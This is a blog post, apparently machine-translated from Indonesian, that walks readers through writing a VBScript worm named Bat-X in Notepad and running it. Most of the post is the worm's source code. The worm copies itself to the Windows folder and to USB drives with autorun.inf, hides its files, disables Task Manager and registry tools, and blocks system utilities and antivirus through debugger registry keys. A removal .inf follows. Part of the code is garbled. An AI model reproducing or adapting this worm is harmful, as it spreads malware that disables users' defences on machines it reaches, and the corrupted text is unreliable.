Saturday, December 27, 2008

Make Virus Via NotePad

We will create a more powerful virus again. If you have not yet know, I want to apologize because in the previous article have an error code. Please replace the word "rekursif" to "rekur". If not, syntax error can later
Come on now we are open Notepadnya and type the following code. If a lazy tinggak Copy> Paste ....

'Bat-X
'Variant of Kalong.VBS
on error resume next
'Dim words following
rekur dim, windowpath, desades, fs, mf, content, TF, bat, nt, check, sd
'To prepare the content autorun
content = "[autorun]" & vbCrLf & "shellexecute = wscript.exe k4l0n6ms32.dll.vbs"
set fs = createobject ( "Scripting.FileSystemObject")
set mf = fs.getfile (Wscript.ScriptFullname)
dim text, size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream (1, -2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbCrLf
loop
do
'A parent file
Set windowpath = fs.getspecialfolder (0)
set TF = fs.getfile (windowpath & "\ k4l0n6-x.dll.vbs")
tf.attributes = 32
set TF = fs.createtextfile (windowpath & "\ k4l0n6-x.dll.vbs", 2, true)
tf.write rekur
tf.close
set TF = fs.getfile (windowpath & "\ k4l0n6-x.dll.vbs")
tf.attributes = 39
'Sebar added to the removable disc with Autorun.inf
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set TF = fs.getfile (desades.path & "\ k4l0n6ms32.dll.vbs")
tf.attributes = 32
set TF = fs.createtextfile (desades.path & "\ k4l0n6ms32.dll.vbs", 2, true)
tf.write rekur
tf.close
set TF = fs.getfile (desades.path & "\ k4l0n6ms32.dll.vbs")
tf.attributes = 39
set TF = fs.getfile (desades.path & "\ autorun.inf")
tf.attributes = 32
set TF = fs.createtextfile (desades.path & "\ autorun.inf", 2, true)
tf.write contents
tf.close
set TF = fs.getfile (desades.path & "\ autorun.inf")
tf.attributes = 39
end if
next
'Registry Manipulation
set bat = createobject ( "WScript.Shell")
'Change IE Title
kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title ",":: -> bat-X <-:: 2="" a="" advanced="" amp="" and="" application.="" at="" batch-k4l0n6.dll.vbs="" check="" cmd.exe="" currentversion="" debugger="" disableregistrytools="" disabletaskmgr="" during="" execution="" explorer="" file="" files="" folderoptions="" following="" for="" hidden="" i="" idden="" if="" image="" install.exe="" ivert="" kalong.regwrite="" legalnoticecaption="" legalnoticetext="" lock="" manager="" message="" microsoft="" msconfig.exe="" nofind="" nofolderoptions="" norun="" not="" notepad.exe="" notepad="" noviewcontextmenu="" nt="" o="" onus="" opened="" options="" panic="" pcmav-cln.exe="" pcmav-rtp.exe="" pcmav.exe="" policies="" program="" reason="" reate="" regedit.exe="" regedit="" regedt32.exe="" registryeditor.exe="" right-click="" run="" seen="" setup.exe="" software="" startup="" system="" systemdir="" tart="" task="" the="" windowpath="" windows="" winlogon="" with="" x-bat=""> 1 then
Wscript.sleep 200,000
end if
loop while check <> 1
set sd = createobject ( "Wscript.shell")
sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname
Once you place the code click FILE> SAVE. In the File Type select ALL FILES (*.*) and save with the name k4l0n6ms32.dll.vbs. After that you try to run. And yes, you've run a bat-X.VBS on your computer.
If you open an application called: cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, and PCMAV-RTP. exe so that Notepad will open its more or less like this:
Remember the people that are useful for other people. There is no "dangerous goods" here because you are making them dangerous. I am not responsible if you misuse this code. This is for science only. I curse if abused face similar hammer (Wah ... so famous later) ... do not deh. The point of desperation you by your own.
This virus has the ability Autorun computer so that dicolokkan Removable Disc (Mislanya Flash Disc), which infected the virus will also diinfeksi (if not in the Autorun disabled)
NOTE: To clean the bat-X is easy. Living stop the process called wscript.exe. If the WinNT you can do so through the Task Manager. But if Win9x please search tool such as Task Manager replacement Procexp or CurrProcess. What if sometimes via the Command Prompt I can.
Once you dismiss the process of removing the file wscript.exe parent who called k4l0n6-x.dll.vbs in WINDOWSDIR (C: \ Windows for example). If no first show hidden files with Folder Options. Then fix the Registry. To speed up the code to copy the Notepad:
[Version]
Signature = "$ Chicago $"
Provider = Fariskhi
[DefaultInstall]
AddReg = UnhookRegKey
DelReg = del
[UnhookRegKey]
HKCU, Software \ Microsoft \ Internet Explorer \ Main, Window Title, 0, "INTERNET EXPLORER"
[del]
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoFind
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoFolderOptions
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoRun
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableRegistryTools
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableTaskMgr
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoViewContextMenu
HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon, LegalNoticeCaption
HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon, LegalNoticeText
HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Run, Systemdir
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ cmd.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ install.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ msconfig.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ regedit.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ regedt32.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ RegistryEditor.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ setup.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ PCMAV.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ PCMAV-RTP.exe, Debugger
After that save the FILE TYPE: ALL FILES (*.*) and save with the name: kalongxremoval.inf. Then right-click the file and select install. So we create a virus and Antidotnya together with Notepad.ini tutorial is the property of friends but I am calm aja da kurubah sintak program in the registry in its

Source: http://sahammudien.wordpress.com/2007/12/12/make-virus-via-notepad/

No comments:

Post a Comment

Template Designed by Mastemplate